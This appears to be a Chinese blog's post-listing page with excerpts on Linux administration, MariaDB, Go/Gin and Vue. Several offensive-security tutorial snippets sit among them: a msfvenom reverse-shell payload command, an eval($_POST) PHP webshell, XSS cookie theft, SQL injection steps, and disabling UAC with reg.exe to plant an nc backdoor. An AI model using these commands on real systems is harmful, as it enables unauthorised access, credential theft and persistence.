- 博客(27)
- 收藏
- 关注
原创 linux的命令使用
1.创建用户添加用户 useradd2.切换用户 su3.设置密码 passwd4.修改用户 usermod -l 修改用户名称5,退出当前用户6,删除用户 userdel2,用户组_相关操作1, 添加用户组 groupadd kaifa(开发)2.修改用户组 的名字3,查看用户所在组4,删除用户组3,管理用户组里面的成员 gpasswd1, 直接回车 查看帮助信息2, 添加用户到用户组3,查看是否添加成功二、系统管理__相关命令1,时间查询查看当
2022-06-15 15:25:41 496
原创 free第一节课 xss类型
解压 unzip fei.zip -d /var/www/html查看web(http)什么权限: ps -aux | grep httpd修改靶场 权限为 httpd 相同的 apache权限 :chown apache:apache -R /var/www/html : -R 是递归授权构造恶意url在那个页面有xss漏洞 他点的时候 就把cookie传到我0.2的地址上了反射型存储型dom型1,反射性 是一次性链接 用户上当点一次 受骗一次2,存储型 是最佳状态 是可以上
2022-06-11 18:37:45 204
原创 centos 下载安装配置mysql mariadb-server
1.第一步下载2.第二步启动3,配置4,设置远程登入用户4.1设置防火墙4.2 加入一个远程登入用户1,查看mysql所有用户2,增加一条3,刷新
2022-06-15 17:16:42 402
原创 msfvenom
1,msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.55 lport=4444 -f exe > /root/shell.exe2,use exploit/multi/handler 监听模块
2022-06-14 14:38:10 702
原创 sqlMap的简单使用
一、单个、多个 url 查询1.单个 -u1.多个 -mfeixiang.txt:http.txt:三 ,http bp日志扫描使用bp抓包 保持访问过的 http头部文件-l :log http log 的意思–level 5 : cookie 等http头部文件查询
2022-06-05 15:28:13 581
原创 mysql 盲注 读取文件 mysql 写入文件
文章目录一、sssss1.盲注的流程-mysql 读取文件mysql 写入文件提示:table_schema = 库名称table_name = 表名称column_name = 字段名称information.schcema库 下面有两个表1,tables = 存放的是 所有的 库名 + 表名(通过where 库名来获取 所有的表)2,columns = 存放的是 所有的列名 (通过where 表名来获取 所有的字段)一、sssss1.unionselect
2022-05-30 22:16:15 365
原创 sql注入
文章目录方法1.注释三种方式————执行过程————一,查看注入点类型 数字还是字符串二,查看有几列三,查看回显位 union四,查一个库下面有几张表+几个列提示:方法 - select database() #所在数据库 - select user() # root@localhost - select version() #mysql 版本 - select @@datadir #mysql 所在路径 - select @
2022-05-24 19:47:02 284
原创 前后端分离实现 get post 请求
文章目录一、前端代码二、golang gin 后端1.初始化 下载gin 并运行2,Get 请求3,Post请求--------------容易遇到的问题--------------提示: 前端:vue3 后端:go 框架 gin一、前端代码1.titleaxios.get('/get',{ params:{ id:1 } }).then((res,err)=>{ console.log(res); })axios.post('/po
2022-05-22 18:03:44 486
原创 go golang gin的使用
title文章目录前言一、配置gin1.创建main.go文件2.安装gin二、title三、title四、title五、title--------------容易遇到的问题--------------前言提示:123一、配置gin1.创建main.go文件package mainimport "github.com/gin-gonic/gin"func main() { r := gin.Default() r.GET("/ping", func(c *gin.Context
2022-05-21 17:15:55 869
原创 15 一句话代码 中国蚁剑 中国蚁剑
title文章目录前言一、一句话代码 webshell php.php post 注入二、中国蚁剑 (需要下载两个 1:软件 2:解释器)三、Burp (burp_suite_pro_v2021.8.2)4.更新的话前言提示:123一、一句话代码 webshell php.php post 注入1.下载 hackbar 有 post<?php @eval($_POST["xuegod"]); ?>2.输入 xuegod=phpinfo(); 执行 这个也行:
2022-05-21 02:56:29 1053
原创 go mysql
标题title文章目录标题连接数据库连接数据库1.下载go get -u github.com/go-sql-driver/mysql2.全部代码package mainimport ( "database/sql" "fmt" _ "github.com/go-sql-driver/mysql" //导入)func main() { dsn := "账号:密码@tcp(ip:3306)/库名称" db, err := sql.Open("mysql", dsn)
2022-05-18 15:37:52 612
原创 vue跨域解决 axios
vue3 + viteimport { defineConfig } from 'vite'import vue from '@vitejs/plugin-vue'// https://vitejs.dev/config/export default defineConfig({ plugins: [vue()], server:{ proxy:{ //这里是通过请求/api 来转发到 https://api.pingping6.com/ //假如你要请求https://
2022-05-18 00:12:21 152
原创 mysql普通使用方法
mysql增删改查文章目录前言一、增1.普通增加2.多条增加二、删除1.普通删除三、改1.普通改2.有条件改四、查1.普通查询2.有条件查询--------------容易遇到的问题--------------前言提示:123一、增1.普通增加插入一条一个值 insert into 【表名字】 (name) values ('【值】');插入一条二个值 insert into 【表名字】 (name) values ('【值】','【值】');2.多条增加insert
2022-05-13 01:16:06 307
原创 centos 7 下安装 maridb数据库 (mysql)
maridb数据库文章目录前言一、title1.添加maridb源二、安装三、配置 MariaDB--------------容易遇到的问题--------------1.不能远程登入2.配置文件位置:/etc/my.cnf前言提示:123一、title1.添加maridb源vim /etc/yum.repos.d/MariaDB.repo# MariaDB 10.6 CentOS repository list - created 2021-12-22 11:16 UTC# htt
2022-05-12 16:36:35 379
原创 通过socks 代理 攻击局域网的电脑
攻击其他局域网内的电脑文章目录前言一、生成木马1.生成木马2.设置监听3.设置reverse payload二、等待目标机上钩之后三、title四、title五、title--------------容易遇到的问题--------------前言提示:123一、生成木马1.生成木马msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp2.设置监听└─# msfdb run msf6 > use
2022-05-11 20:18:05 1065
原创 frp的使用
一个是服务器和客户机的连接一个是隧道文章目录前言一、下载frp二、建立连接1.服务器配置 frps.ini2.kali配置 frpc.ini三、建立ssh连接1.服务器配置 frps.ini2.kali配置 frpc.ini四、建立web内网映射 并且 建立仪表盘1.服务器配置 frps.ini2.kali配置 frpc.ini--------------容易遇到的问题--------------前言提示:123一、下载frpwget https://github.com/fatedie
2022-05-11 16:57:35 975
原创 centos 防火墙基本操作
1.安装防火墙安装firewalld 防火墙yum install firewalld2.防火墙基本操作查看版本: firewall-cmd --version显示状态: firewall-cmd --state查看所有打开的端口: netstat -anp开启防火墙 systemctl start firewalld关闭防火墙 systemctl stop firewalld若遇到无法开启先用:systemctl unmask firewalld.service然后:systemctl
2022-05-08 21:12:45 143
原创 生成payload木1马 攻击 linux
需要1.开启httpd2.生成payload 木马3.启动msfdb run 监听4.5.6.开始1.1: 开启httpdnmap install参数说明ADD 添加一个注册表项-v 创建键值-t 键值类型-d 键值的值 // 0:关闭uac 1:开启uac-f 强制修改注册表项收到...
2022-05-07 01:43:43 689
原创 通过远峰之蓝给目标机植入nc后门
清除日志获取目标机cmd权限关闭 UAC 1.关闭 UAC 远程限制 2.关闭 UAC通知上传nc.exe 并且 设置nc开机启动4.用kali的nc连接目标开始1. 获取目标机cmd权限通过远峰之蓝获取2. --进入目标shell-- 关闭UAC 1.关闭 UAC 远程限制 2.关闭 UAC通知2.1: 关闭 UAC 远程限制cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Window
2022-05-06 22:18:01 261
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人